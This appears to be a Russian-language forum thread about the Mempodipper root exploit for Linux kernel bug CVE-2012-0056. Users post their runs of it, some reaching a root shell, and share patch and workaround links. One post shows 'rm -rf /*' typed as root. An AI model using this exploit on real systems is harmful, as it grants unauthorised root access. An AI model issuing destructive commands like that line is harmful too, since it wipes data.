Ядро 3.2.1:

$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2684/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049a44.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a38.
[+] Executing su with shellcode.
# whoami
root

https://access.redhat.com/kb/docs/DOC-69129
https://bugzilla.redhat.com/show_bug.cgi?id=782642

Там же - workaround с использованием SystemTap. Другой workaround - убрать пользователям доступ ко всем SUID/SGID программам.

К сожалению, исправление в git от 17-го января привносит другую проблему, сравнительно небольшую (обход RLIMIT_NPROC * RLIMIT_AS):

http://www.openwall.com/lists/oss-security/2012/01/22/5

Дискуссия на /r/netsec:

http://www.reddit.com/r/netsec/comments/os8wl/linux_local_privilege_escalatio

Более старые ядра именно этой атаке не подвержены, но могут быть подвержены схожим атакам через чтение (а не запись) того же /proc/<pid>/mem. Конкретных атак (attack vectors) пока нет (пока не нашли такой программы и такого способа атаки, чтобы это было проблемой безопасности); в теории, это может быть утечка криптографических ключей, хешей паролей и т.п. Исправление этого обсуждается. В любом случае, это будет другой номер CVE.

не работает :S

./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9108/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./a.out -o ADDRESS
[-] Example: ./a.out -o 0x402178

Подозреваю, что уже пофиксено? Тогда в топике дезинформация - Arch не попадает в список.

[+] Calculating su padding.
[+] Seeking to offset 0x4021cc.
[+] Executing su with shellcode.
#
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),115(lpadmin),117(admin),122(sambashare)
# rm -rf /*

:)))

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/30336/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x25e0.
[+] Calculating su padding.
[+] Seeking to offset 0x25be.
[+] Executing su with shellcode.
ilya@ILYA:/tmp> whoami
ilya

Это я что то не так делаю, или в openSUSE этого бага нету?

Вот это скорость. В Fedora обновление в лучшем случае в среду вечером выйдет.

[dAverk@dAverk ~]$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7121/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x21a8.
[+] Calculating su padding.
[+] Seeking to offset 0x2186.
[+] Executing su with shellcode.
[dAverk@dAverk ~]$ whoami
dAverk
[dAverk@dAverk ~]$ uname -a
Linux dAverk.4820TG 3.1.7-1.fc16.x86_64 #1 SMP Tue Jan 3 19:45:05 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[dAverk@dAverk ~]$ cat /etc/redhat-release
RFRemix release 16 (Verne)
[dAverk@dAverk ~]$ id
uid=1000(dAverk) gid=1000(dAverk) группы=1000(dAverk)

uname -a
Linux 3.1.5 #2 SMP Sat Dec 10 22:58:40 EET 2011 i686 Intel(R) Core(TM)2 Duo CPU     E8400  @ 3.00GHz GenuineIntel GNU/Linux

./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10462/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./mempodipper -o ADDRESS
[-] Example: ./mempodipper -o 0x402178

не работает. %-(

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2478/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1734.
[+] Calculating su padding.
[+] Seeking to offset 0x1726.
[+] Executing su with shellcode.
bash-4.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/5212/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1984.
[+] Calculating su padding.
[+] Seeking to offset 0x1962.
[+] Executing su with shellcode.
[alexander@localhost ~]$ whoami
alexander
[alexander@localhost ~]$ uname -r
2.6.39.4-5.1-desktop
[alexander@localhost ~]$

ROSA 2011 не работает! :)

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/13961/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: /tmp/CVE-201209956 -o ADDRESS
[-] Example: /tmp/CVE-201209956 -o 0x402178

Не работает на 3.0.4-hardened-r5, другого и не ожидал.

/var/abs/core/linux $ cat PKGBUILD |grep CVE-2012-0056
        'CVE-2012-0056.patch')
  # patch for CVE-2012-0056
  patch -p1 -i "${srcdir}/CVE-2012-0056.patch"

uname -a
Linux notebook.blahblah 3.1.9-1.fc16.i686 #1 SMP Fri Jan 13 17:14:41 UTC 2012 i686 i686 i386 GNU/Linux

$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4736/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1524.
[+] Calculating su padding.
[+] Seeking to offset 0x1502.
[+] Executing su with shellcode.
[artem@notebook eatme]$ whoami
artem

Как-то так, в общем.

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12942/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x402298.
[+] Calculating su padding.
[+] Seeking to offset 0x40227d.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2# rm -r /te.cpp
sh-4.2#
...
Бл***

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x80499e8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2695/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x80499dc.
[+] Executing su with shellcode.
sh-4.1# test
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)